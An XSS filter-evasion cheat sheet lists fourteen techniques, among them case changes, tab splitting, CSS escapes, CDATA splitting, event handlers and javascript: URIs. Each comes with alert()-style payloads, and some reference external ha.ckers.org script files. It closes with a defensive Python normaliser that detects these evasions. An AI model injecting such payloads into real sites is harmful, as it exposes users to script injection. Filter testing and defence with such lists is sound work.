1. Change the letter case.

<sCript>alert('d')</scRipT>
2. Add extra characters to evade regular-expression checks.

<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" '' SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use another file extension in place of .js.

<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file.

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example (contents of the linked xss.css):

body {
    background-image: url('javascript:alert("XSS");')
}
5. Insert other characters inside the script tag.

<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or newline to evade (the gaps inside "javascript" below are a literal tab or newline character, not spaces).

<img src="jav ascr ipt:alert('XSS3')">
<img src="jav ascr ipt:alert('XSS3')">
<IMG SRC="jav ascript:alert('XSS');">
-> tab
-> newline
7. Use "\" (CSS backslash escapes and comments) to evade.

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped).

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script in an HTML tag (event-handler attributes).

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside an SWF.

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code, then recombine it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url().

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
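As an added defender-side example (my own code, not part of the original post), the following Python normalises an HTML fragment roughly the way a browser does before a pattern is matched, so that the case changes, tabs/newlines, CSS backslash escapes and comment splitting listed in items 1, 5, 6, 7 and 11 no longer slip past a literal match. The sample fragments are constructed from the items above; the pattern and the function names are my own assumptions, not any library's API.

```python
import re

# Pattern of the kind a naive server-side filter uses; every item above is
# built to slip past a literal, case-sensitive match like this one.
DANGEROUS = re.compile(r'<script|javascript:|expression\(')


def naive_check(fragment: str) -> bool:
    """Match the raw input as-is: defeated by case, tabs, escapes, comments."""
    return bool(DANGEROUS.search(fragment))


def normalize(fragment: str) -> str:
    """Canonicalise the fragment roughly as a browser does before interpreting it."""
    s = fragment.lower()                                    # item 1: sCript
    s = re.sub(r'<!--.*?-->', '', s, flags=re.S)            # item 11: javas<!-- -->cript
    s = re.sub(r'/\*.*?\*/', '', s, flags=re.S)             # item 7: expr/*x*/ession
    # CSS hex escapes: \6a (plus one optional whitespace) decodes to 'j'
    s = re.sub(r'\\([0-9a-f]{1,6})\s?', lambda m: chr(int(m.group(1), 16)), s)
    s = s.replace('\\', '')                                 # item 7: \ja\vasc\ript
    s = re.sub(r'[\x00-\x20]+', '', s)                      # item 6: tab/newline inside javascript
    return s


def hardened_check(fragment: str) -> bool:
    """The same pattern, applied after normalisation."""
    return bool(DANGEROUS.search(normalize(fragment)))


# Constructed samples modelled on items 1, 6, 7, 11 and 5 above.
EVASIONS = [
    "<sCript>alert('d')</scRipT>",
    "<img src=\"jav\tascr\nipt:alert('XSS3')\">",
    "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS32\")';</STYLE>",
    "<IMG STYLE='xss:expre\\ssion(alert(\"XSS33\"))'>",
    "<IMG STYLE=\"xss:expr/*anyword*/ession(alert('sss'))\">",
    "<IMG SRC=\"javas<!-- -->cript:alert('XSS')\">",
    "<SCRIPT/anyword SRC=\"t.js\"></SCRIPT>",
]
BENIGN = "<p>Hello, world</p>"


def report(fragments):
    """Return (naive_hit, hardened_hit) for each fragment."""
    return [(naive_check(f), hardened_check(f)) for f in fragments]


if __name__ == "__main__":
    for f, (naive, hardened) in zip(EVASIONS + [BENIGN], report(EVASIONS + [BENIGN])):
        print(f"naive={str(naive):5} hardened={str(hardened):5} {f!r}")
```

Normalising before matching catches the listed evasions but is still a blacklist; contextual output encoding or an allow-list HTML sanitiser is the actual mitigation.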